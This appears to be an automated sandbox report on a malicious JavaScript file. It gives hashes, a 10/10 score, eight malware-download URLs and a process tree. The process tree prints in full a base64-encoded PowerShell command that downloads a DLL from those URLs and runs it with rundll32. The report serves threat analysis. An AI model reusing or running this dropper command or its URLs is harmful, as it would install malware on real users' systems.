601ff38ad680f9e707e122f8b9bcd3f9f57e10c7403c7adee0cf570b1924b8ee

Analysis

max time kernel
34s
max time network
30s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
22-03-2023 01:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

90136d6f6a748093254c25d77154148ad20f27a98febcdca2fa287a1b898f732.js
Size

65KB
MD5

677e4c55e7f8f97eda933525c8ed77ab
SHA1

ddf062a6ef5059d59d9e39a8daa270727cd059b5
SHA256

90136d6f6a748093254c25d77154148ad20f27a98febcdca2fa287a1b898f732
SHA512

790cc86a95f0bf90aee9ea50424bc7cb78d9fdb971f0ff737a968e549b85baa8be10c24f0a7ccc451b266c02065f7152ac2a7e2ba3f5275b55f6438ae95379f6
SSDEEP

768:XnAhHZ0CV2Fh1EwUBlKKKUUq3ee7Nr3G9iPxVEysavZA8S5il2FWWtlQvThUxuTB:QX0/0QYD2QWiUQkEZKMicsPe

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://onestopsilkscreeners.ca/o6g4bt1/SHkwxN

exe.dropper

https://smeolbd.com/ntaUX/gT17uB8zXQQ1

exe.dropper

https://sobanaze.com/cJn7i/KIeo1

exe.dropper

https://kingzunlimited.com/VvAmv/HrBnUeEt83Z

exe.dropper

https://odwazig.nl/xNV7x/AHwPIvNXWMJ

exe.dropper

https://discountlandllc.com/uUbH/FEnP9o3WZa

exe.dropper

https://canadianused.com/euSgOJA/hcrqV3k2SO

exe.dropper

https://getcash2surveys.com/0HFE0G/Kz55wwkxZ5

Signatures

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2004	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2004	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2016 wrote to memory of 2004	2016	wscript.exe	28
PID 2016 wrote to memory of 2004	2016	wscript.exe	28
PID 2016 wrote to memory of 2004	2016	wscript.exe	28

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\90136d6f6a748093254c25d77154148ad20f27a98febcdca2fa287a1b898f732.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQAZABlAGIAYQB1AGMAaABlAHIAaQBlAHMAQwBvAG4AdAByAGEAYwB0AGkAbABpAHQAeQAgAD0AIAAoACIAaAB0AHQAcABzADoALwAvAG8AbgBlAHMAdABvAHAAcwBpAGwAawBzAGMAcgBlAGUAbgBlAHIAcwAuAGMAYQAvAG8ANgBnADQAYgB0ADEALwBTAEgAawB3AHgATgAsAGgAdAB0AHAAcwA6AC8ALwBzAG0AZQBvAGwAYgBkAC4AYwBvAG0ALwBuAHQAYQBVAFgALwBnAFQAMQA3AHUAQgA4AHoAWABRAFEAMQAsAGgAdAB0AHAAcwA6AC8ALwBzAG8AYgBhAG4AYQB6AGUALgBjAG8AbQAvAGMASgBuADcAaQAvAEsASQBlAG8AMQAsAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHoAdQBuAGwAaQBtAGkAdABlAGQALgBjAG8AbQAvAFYAdgBBAG0AdgAvAEgAcgBCAG4AVQBlAEUAdAA4ADMAWgAsAGgAdAB0AHAAcwA6AC8ALwBvAGQAdwBhAHoAaQBnAC4AbgBsAC8AeABOAFYANwB4AC8AQQBIAHcAUABJAHYATgBYAFcATQBKACwAaAB0AHQAcABzADoALwAvAGQAaQBzAGMAbwB1AG4AdABsAGEAbgBkAGwAbABjAC4AYwBvAG0ALwB1AFUAYgBIAC8ARgBFAG4AUAA5AG8AMwBXAFoAYQAsAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBhAGQAaQBhAG4AdQBzAGUAZAAuAGMAbwBtAC8AZQB1AFMAZwBPAEoAQQAvAGgAYwByAHEAVgAzAGsAMgBTAE8ALABoAHQAdABwAHMAOgAvAC8AZwBlAHQAYwBhAHMAaAAyAHMAdQByAHYAZQB5AHMALgBjAG8AbQAvADAASABGAEUAMABHAC8ASwB6ADUANQB3AHcAawB4AFoANQAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABGAGEAdAB0AGUAZABCAGEAdAB0AGUAcgBzACAAaQBuACAAJABkAGUAYgBhAHUAYwBoAGUAcgBpAGUAcwBDAG8AbgB0AHIAYQBjAHQAaQBsAGkAdAB5ACkAIAB7AHQAcgB5ACAAewBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAEYAYQB0AHQAZQBkAEIAYQB0AHQAZQByAHMAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADkAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAG0AaQBzAHQAZQBuAGQAcwBSAGUAbQBpAHMAZQBkAC4AZABsAGwAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABlAG4AdgA6AFQARQBNAFAAXABtAGkAcwB0AGUAbgBkAHMAUgBlAG0AaQBzAGUAZAAuAGQAbABsACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABcAG0AaQBzAHQAZQBuAGQAcwBSAGUAbQBpAHMAZQBkAC4AZABsAGwALABXAFcANQAwADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7AH0AfQA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2004

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2004-58-0x000000001B230000-0x000000001B512000-memory.dmp

Filesize
2.9MB

Download
memory/2004-59-0x00000000023E0000-0x00000000023E8000-memory.dmp

Filesize
32KB

Download
memory/2004-61-0x0000000002740000-0x00000000027C0000-memory.dmp

Filesize
512KB

Download
memory/2004-62-0x0000000002740000-0x00000000027C0000-memory.dmp

Filesize
512KB

Download
memory/2004-60-0x0000000002740000-0x00000000027C0000-memory.dmp

Filesize
512KB

Download
memory/2004-63-0x0000000002740000-0x00000000027C0000-memory.dmp

Filesize
512KB

Download
memory/2004-64-0x0000000002740000-0x00000000027C0000-memory.dmp

Filesize
512KB

Download
memory/2004-65-0x0000000002740000-0x00000000027C0000-memory.dmp

Filesize
512KB

Download
memory/2004-66-0x0000000002740000-0x00000000027C0000-memory.dmp

Filesize
512KB

Download
memory/2004-67-0x0000000002740000-0x00000000027C0000-memory.dmp

Filesize
512KB

Download